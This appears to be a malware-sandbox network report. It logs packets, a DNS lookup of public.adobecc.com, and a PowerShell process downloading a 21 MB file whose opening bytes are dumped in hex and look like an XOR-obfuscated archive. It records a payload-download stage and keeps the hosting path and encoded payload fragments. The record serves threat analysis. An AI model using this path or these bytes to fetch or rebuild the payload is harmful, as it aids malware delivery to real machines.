                                                                  Jul 11, 2024 03:56:17.428374052 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.428575993 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.428620100 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.428666115 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.428666115 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.428684950 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.428809881 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.429147959 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429191113 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429227114 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.429248095 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429272890 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.429363966 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.429651022 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429692030 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429712057 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.429725885 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.429754019 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.430032015 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430072069 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430100918 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.430119038 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430157900 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.430833101 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430874109 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430917978 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.430943012 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.430969000 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.431484938 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.431524992 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.431560993 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.431581974 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.431607008 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.478807926 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.498615980 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.498658895 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.498698950 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.498740911 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.498778105 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.498823881 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.516769886 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.516830921 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.516866922 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.516890049 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.516921043 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.516940117 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517268896 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517312050 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517339945 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517354012 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517380953 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517401934 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517735004 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517776966 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517802954 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517817020 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.517842054 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.517877102 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518215895 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518265009 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518294096 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518306017 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518336058 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518377066 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518708944 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518757105 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518796921 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518810987 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.518837929 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.518882036 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.519697905 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519737959 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519776106 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.519788980 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519818068 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.519836903 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519886971 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519898891 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.519922018 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.519958019 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.519982100 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.587615967 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.587673903 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.587706089 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.587740898 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.587762117 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.587790966 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.606168032 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606211901 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606259108 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.606329918 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606368065 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.606528044 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.606806993 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606848955 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606885910 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.606905937 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.606930017 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.607013941 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.607600927 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.607640982 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.607675076 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.607688904 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.607716084 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.607734919 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608053923 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608134031 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608144999 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608160019 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608196974 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608217955 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608310938 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608351946 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608383894 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608397007 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.608423948 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.608442068 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.609230995 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.609277964 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.609307051 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.609328032 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.609352112 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.609461069 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.609899044 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.609940052 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.609966993 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.609985113 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.610008955 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.610039949 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.676183939 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.676253080 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.676400900 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.676400900 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.676470995 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.676601887 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.694644928 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.694714069 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.694753885 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.694824934 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.694864988 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.694953918 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695197105 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695245028 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695287943 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695307016 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695338964 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695357084 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695616961 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695658922 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695694923 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695708036 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695766926 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.695806980 CEST44349730151.101.129.138192.168.2.4
                                                                  Jul 11, 2024 03:56:17.695995092 CEST49730443192.168.2.4151.101.129.138
                                                                  Jul 11, 2024 03:56:17.699794054 CEST49730443192.168.2.4151.101.129.138
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 11, 2024 03:56:02.263931990 CEST5246753192.168.2.41.1.1.1
                                                                  Jul 11, 2024 03:56:02.271311045 CEST53524671.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jul 11, 2024 03:56:02.263931990 CEST192.168.2.41.1.1.10x161dStandard query (0)public.adobecc.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jul 11, 2024 03:56:02.271311045 CEST1.1.1.1192.168.2.40x161dNo error (0)public.adobecc.compublic.adobecc.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jul 11, 2024 03:56:02.271311045 CEST1.1.1.1192.168.2.40x161dNo error (0)public.adobecc.map.fastly.net151.101.129.138A (IP address)IN (0x0001)false
                                                                  Jul 11, 2024 03:56:02.271311045 CEST1.1.1.1192.168.2.40x161dNo error (0)public.adobecc.map.fastly.net151.101.1.138A (IP address)IN (0x0001)false
                                                                  Jul 11, 2024 03:56:02.271311045 CEST1.1.1.1192.168.2.40x161dNo error (0)public.adobecc.map.fastly.net151.101.65.138A (IP address)IN (0x0001)false
                                                                  Jul 11, 2024 03:56:02.271311045 CEST1.1.1.1192.168.2.40x161dNo error (0)public.adobecc.map.fastly.net151.101.193.138A (IP address)IN (0x0001)false
                                                                  • public.adobecc.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449730151.101.129.1384437128C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-11 01:56:02 UTC104OUTGET /files/1CRUSWG253MBK5OSUBRDH4V033RFFF HTTP/1.1
                                                                  Host: public.adobecc.com
                                                                  Connection: Keep-Alive
                                                                  2024-07-11 01:56:02 UTC879INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 21216487
                                                                  Server: openresty
                                                                  Content-Type: application/octet-stream
                                                                  x-resource-urn: urn:aaid:sc:VA6C2:db465164-5b7a-46ea-8b5f-890deee3c92e
                                                                  etag: "4794a4ba-ee3f-41ed-aab2-d0379d9c6349"
                                                                  content-location: /public/files/1CRUSWG253MBK5OSUBRDH4V033RFFF
                                                                  x-resource-id: VA6C2/db465164-5b7a-46ea-8b5f-890deee3c92e
                                                                  x-request-id: H9PsSJp0o8sJ77Xd4PHYC1HIkwWrjxZX
                                                                  x-breadcrumb-trail: CCSTORAGE_JVAWQC4CIC
                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                  Access-Control-Max-Age: 86400
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Access-Control-Allow-Origin: *
                                                                  Content-Disposition: attachment
                                                                  Accept-Ranges: bytes
                                                                  Age: 0
                                                                  Date: Thu, 11 Jul 2024 01:56:02 GMT
                                                                  X-Served-By: cache-iad-kcgs7200079-IAD, cache-nyc-kteb1890038-NYC
                                                                  X-Cache: HIT, MISS
                                                                  X-Cache-Hits: 2, 0
                                                                  X-Timer: S1720662963.943156,VS0,VE9
                                                                  Vary: Accept-Encoding
                                                                  2024-07-11 01:56:02 UTC1371INData Raw: 44 5f 17 10 00 14 14 14 14 14 ba 96 fc 4c 14 14 14 14 14 14 14 14 14 14 14 14 07 14 14 14 57 7c 66 7b 79 71 3b 55 64 64 78 7d 77 75 60 7d 7b 7a 3b 44 5f 17 10 00 14 14 14 14 14 a8 96 fc 4c 14 14 14 14 14 14 14 14 14 14 14 14 36 14 14 14 57 7c 66 7b 79 71 3b 55 64 64 78 7d 77 75 60 7d 7b 7a 3b 25 25 2c 3a 24 3a 21 2d 2d 27 3a 25 26 24 3b 44 5f 17 10 00 14 14 14 1c 14 ba 96 fc 4c 78 ac 6d a0 8e 14 14 14 f0 14 14 14 2d 14 14 14 57 7c 66 7b 79 71 3b 55 64 64 78 7d 77 75 60 7d 7b 7a 3b 25 25 2c 3a 24 3a 21 2d 2d 27 3a 25 26 24 3b 25 26 22 3a 24 3a 22 20 23 2c 3a 25 26 23 3a 79 75 7a 7d 72 71 67 60 79 9a d5 1a 96 24 04 50 fb 32 ea 17 a3 8a bc 94 12 18 15 fb ea 94 43 47 df 22 20 fd 7a 59 a3 b6 e8 a9 94 f6 dd a9 59 72 f2 f9 20 9e 0d e4 f2 d2 f9 32 5d 4a fc 9c 4f
                                                                  Data Ascii: D_LW|f{yq;Uddx}wu`}{z;D_L6W|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;D_Lxm-W|f{yq;Uddx}wu`}{z;%%,:$:!--':%&$;%&":$:" #,:%&#:yuz}rqg`y$P2CG" zYYr 2]JO
                                                                  2024-07-11 01:56:02 UTC1371INData Raw: 56 2a f2 ba df 86 f8 4b 9e 41 27 65 d0 c0 d1 40 be be 5a 48 fa 4f 2f 1c a5 de 28 dc f8 99 f6 c7 61 b2 59 ba 53 14 6d 87 f0 2a 23 dc e1 c2 b8 f8 a5 ca b0 ef 8d fb 54 88 b8 d8 27 8d 88 b6 ad 87 8c 86 77 96 25 ac c7 70 71 de 60 47 52 57 88 dd c4 d0 56 9f a5 e1 95 26 b8 cf 8f 28 c6 7e 91 1a a4 c8 80 7d 01 a0 c1 c3 62 53 f8 a0 6f 3e 47 90 d4 63 79 b5 84 b8 2e a0 96 f5 89 50 5b 63 dc 08 ac 1b ea dd ca e3 3f 06 64 fc 17 35 9f 77 26 fb c7 ad 4c 87 c6 36 3f 13 a1 6a fb e1 00 30 71 17 a9 ea e4 a2 2a 56 f4 3a 6c 93 f7 91 90 f4 59 7a 1c e0 12 14 b2 21 4d c4 9e f8 09 c1 07 59 af f4 5b 97 ab 32 ec 7f 92 ab 67 d8 0b 73 56 ce 76 7a 4b 02 bf 78 4d 12 a4 de 62 9e 87 ff d0 80 1e 08 5f ac 34 e6 ff 7d e8 85 f6 3f 9b ba d0 c8 50 e5 d7 86 61 9e e3 cc 8a d3 d0 8e 63 ce 85 6e ad
                                                                  Data Ascii: V*KA'e@ZHO/(aYSm*#T'w%pq`GRWV&(~}bSo>Gcy.P[c?d5w&L6?j0q*V:lYz!MY[2gsVvzKxMb_4}?Pacn
                                                                  2024-07-11 01:56:02 UTC1371INData Raw: 0f d3 63 17 8a b6 26 07 73 5b b2 84 f1 3e a4 46 8c a3 2e f9 2a 08 5e 9f 37 17 21 a1 71 e0 b0 40 4c fb d7 65 d1 9a 27 2a 61 a1 99 3f 44 5f f6 18 f6 be f2 e0 07 b6 33 2d d0 8f 0b 4c 6a 02 e5 27 5a 7b 83 11 6c aa 66 14 c4 4a 86 28 eb fe aa 08 a1 09 d0 66 ff c6 e9 c4 cf 1b 56 76 54 d0 3a e5 32 1b b5 76 c4 b8 64 bf da ec 08 b6 f3 e1 a7 4c cc 23 54 3b e8 f8 4d c0 1f 98 0b d6 67 74 33 45 49 e6 ed 15 03 81 27 9f 8a cf bd 88 86 bd 83 0f d7 df d9 91 f3 d4 df a8 c8 d2 9f df d1 9d 8a 00 3e 23 35 57 3b 03 d7 df 2d f5 2d ec 43 3c a0 f8 f6 56 25 b6 f3 af 42 38 e0 46 6b a9 84 ab 81 1e 39 91 f3 f4 04 3c 60 d3 d1 91 34 c3 9f 40 fc e4 41 6e b5 b1 a8 c4 5a 6c da 2a 12 91 7e bb 9e 98 cf e4 ba 24 7a f1 c0 ad dd f6 d1 61 8d 50 db a9 40 c3 01 75 b8 7b f5 61 61 52 b8 2b 95 56 6f
                                                                  Data Ascii: c&s[>F.*^7!q@Le'*a?D_3-Lj'Z{lfJ(fVvT:2vdL#T;Mgt3EI'>#5W;--C<V%B8Fk9<`4@AnZl*~$zaP@u{aaR+Vo
                                                                  2024-07-11 01:56:02 UTC1371INData Raw: a6 c7 11 14 74 f5 97 e5 16 f3 e2 4b f3 96 88 0c 9a 86 4c 69 a1 92 5c fc 5c 55 f2 55 bd a6 e1 79 a9 25 78 ca 39 11 de c3 86 fb 38 5a d6 0b 4c 39 be 7b e4 47 35 6d 0b 7b 77 cf 5b 94 ba da 2a ff 19 37 cf 32 17 a7 3e 86 55 dd 08 92 28 ba 24 24 17 51 0e bb e0 b6 35 3b a4 eb 68 d5 94 ae 5e 75 d6 25 fb 33 c0 55 cd b5 16 d7 bb 34 1a 8d c6 be 19 ac 1b e1 60 81 e7 48 23 41 87 ad 9d 15 5b 74 dc 07 f8 d9 f6 36 1d ce 36 0f 5a 26 a4 81 6b 8c 12 8d 57 6a 09 b8 8a 4b da c8 0b da 3b 41 22 c4 30 a2 ef 73 ea 97 95 02 1f a7 a5 8d 95 3c 07 bf ea 91 e8 ce 09 9e 8d c1 91 0c cb 3f f3 95 e4 4b d2 a0 f9 33 cc 97 6a 3e 10 a7 83 25 fb e1 32 42 cd 54 e8 03 19 83 23 25 5f 7c 0f de 0a 57 36 c4 40 ec 41 bc 78 2b c5 24 c0 09 e8 1b 47 43 20 56 11 95 2c 26 24 1f 26 16 8b 1e ee 59 0a b1 00
                                                                  Data Ascii: tKLi\\UUy%x98ZL9{G5m{w[*72>U($$Q5;h^u%3U4`H#A[t66Z&kWjK;A"0s<?K3j>%2BT#%_|W6@Ax+$GC V,&$&Y
                                                                  2024-07-11 01:56:02 UTC1371INData Raw: 77 a3 38 8e 5a db c0 f7 50 4d 4a 73 7e 00 bf 12 a0 06 24 8c a2 4d 2c 9d 65 79 52 a6 23 2e f5 79 ba 1d 00 3e 8d ab 12 e2 24 1c 8d 11 a8 ba 77 e2 39 f6 e6 ee 08 47 a9 4c 61 6f df 31 1f 2b c2 b6 23 f0 6f 2f 7b 8d fb 23 29 f5 1f 29 f5 4c 2c 75 b9 8a e4 2f 5b 7c db 16 a2 50 64 e2 9d df 69 b2 f9 76 41 d6 2d de c0 8a 81 21 ea 15 62 37 db e6 78 05 52 41 74 e4 e9 05 8e 51 28 4b 80 05 df 92 f9 18 0d ce 27 aa 16 ef 0a bc d9 a0 51 42 62 9f 41 eb c0 e7 bd dd fb 49 7d 37 99 a5 51 c2 a1 d3 13 ff d7 5e 70 9f 78 bc 1f b8 92 42 2c 57 f7 b9 95 ea f3 84 21 88 67 6a da b3 df 0d c0 28 54 cf 6e 3d b2 27 64 91 84 78 7c 17 19 ab f8 dc d1 9e 8f 66 2c c4 e9 43 88 06 15 24 01 a6 ff 88 8b 37 4a 86 ef a8 55 46 aa 06 03 2b 15 a1 12 8a d1 11 de 25 c2 94 9a 41 53 ef 4f e3 2a 24 44 85 1f
                                                                  Data Ascii: w8ZPMJs~$M,eyR#.y>$w9GLao1+#o/{#))L,u/[|PdivA-!b7xRAtQ(K'QBbAI}7Q^pxB,W!gj(Tn='dx|f,C$7JUF+%ASO*$D
                                                                  2024-07-11 01:56:03 UTC1371INData Raw: cb 16 87 e4 1c 32 35 37 c6 a6 b2 96 9e e3 01 bd 95 ec 8c 9a 9b eb 7c ff fc f5 8b 10 56 16 0c 9b e5 c3 74 50 22 18 87 d1 ce 1d 29 1e be 62 d8 99 83 95 29 24 21 15 fa df e7 b4 6f 14 55 a4 f4 c2 2f 59 ff 49 77 66 54 1c 82 fe 46 0c 0c 73 b5 3d 93 5f 38 8b 32 01 63 95 f2 23 34 c4 75 2c 9e 62 01 51 64 07 a4 3a 13 9c 4b 7b e6 d2 e7 90 78 f1 4d d4 6b 10 d3 eb 37 8a 60 1f 62 dc 94 da f9 d0 0d f4 43 6d 00 13 02 44 88 04 51 05 b9 13 da 1b fe bd bb ab c7 4d d6 7e f5 1b 4c d6 b5 7f 2d 5f dc ca 35 41 22 e7 05 d6 71 72 4d 08 a9 11 8c 95 2d df 9e a3 ec 1a d3 84 9e 5e 76 d5 62 cd 7f 68 aa 00 ec 90 4c 44 3b 6f 87 8b 5f 54 4a 16 52 46 95 86 fc e8 80 e7 86 ab 8c 1e 80 45 72 5d ad 31 b9 54 0d 17 18 f0 3b d4 54 52 15 17 0d 57 18 10 58 91 c0 24 17 55 83 d8 b8 71 9d 20 38 f1 cc
                                                                  Data Ascii: 257|VtP")b)$!oU/YIwfTFs=_82c#4u,bQd:K{xMk7`bCmDQM~L-_5A"qrM-^vbhLD;o_TJRFEr]1T;TRWX$Uq 8
                                                                  2024-07-11 01:56:03 UTC1371INData Raw: 73 0a 3b 70 d9 ca 95 e6 e8 91 6e cd 64 10 f9 42 48 20 0d 95 62 d3 96 6d cd 8f 57 cb b6 d8 62 23 0f 48 db 11 6c bc 26 29 9d 41 c7 e4 35 be 5a b4 f0 17 b5 b7 ed 5b 96 61 f7 09 76 29 89 dc c1 1c 4d 09 35 73 16 a7 4a 03 42 09 b0 db 36 36 4f a9 62 fa 14 48 75 30 d3 1c dc ff 3f 86 44 4a 17 ae 15 b8 68 19 fe 7c ce f0 c7 29 90 d4 48 3a d4 97 9d 83 02 f4 c3 61 88 26 75 4d 5d c9 08 ce 0b 01 83 48 26 8e d1 00 17 d8 e1 9e 85 9e 07 98 7c 73 12 e8 19 47 88 18 3a 91 d8 fb 38 b6 0a e0 32 db ed 3b 1e c7 65 31 34 a3 5f d1 80 51 dc 30 80 51 df f4 6b d7 36 48 59 05 34 79 31 19 86 e5 3a f8 5a f8 8e 51 00 fc 00 19 d3 43 53 c8 56 29 e9 f0 4f 20 3c 6e a0 e8 8d 5a 69 55 3b d7 8c 75 82 6a 82 19 ab e6 03 6e ca 5e 4d 7e 6d da 35 83 47 2d 77 b8 4a e7 f8 d3 3f 52 60 95 6f 15 9c 46 59
                                                                  Data Ascii: s;pndBH bmWb#Hl&)A5Z[av)M5sJB66ObHu0?DJh|)H:a&uM]H&|sG:82;e14_Q0Qk6HY4y1:ZQCSV)O <nZiU;ujn^M~m5G-wJ?R`oFY
                                                                  2024-07-11 01:56:03 UTC1371INData Raw: cb 56 0f df 88 1f 6b c0 55 a6 19 eb d3 cd 30 e6 3a 6c df 36 e9 b0 f2 56 e3 94 75 a2 10 ae be 2e d3 f2 76 7e 3a e0 47 1a 4e 49 5b 80 9f bf bf 04 25 fc 31 7a 36 39 bd f6 a9 f0 a5 65 6b 6b 01 fb 0b aa 81 52 42 2a bf f2 bd df e0 c0 71 e8 e5 6d e9 85 47 dc 73 db e7 c0 81 6e 3e 4a 95 b7 fe 35 68 c0 59 d5 df 7d e6 0b c5 16 ab 94 29 dd 97 02 c4 1b 9e 3c a4 de 99 80 db 6a ca 21 85 bd 11 a0 2c 1b f0 6d 49 33 74 a6 e2 52 43 17 d1 13 24 44 ac c1 55 84 e8 c2 ac 40 58 02 bf aa 35 a5 bf 3b c1 fb 78 9f 38 c1 6b 9d fd 68 bd ca 13 a3 d5 51 2e f0 53 b6 84 37 00 bc 72 dd e2 4b 72 e1 1a bb 3f ea da 21 7f 39 13 a6 f6 b6 b6 35 10 bb 73 0a 75 74 e4 96 d1 23 a0 b4 fe 8c fc 0d 9e c1 37 97 ac a2 99 02 02 a1 c1 93 86 b4 4a ca 90 c4 03 71 53 17 c9 f4 51 7c 88 21 44 9c 1f 09 de 2a dd
                                                                  Data Ascii: VkU0:l6Vu.v~:GNI[%1z69ekkRB*qmGsn>J5hY})<j!,mI3tRC$DU@X5;x8khQ.S7rKr?!95sut#7JqSQ|!D*
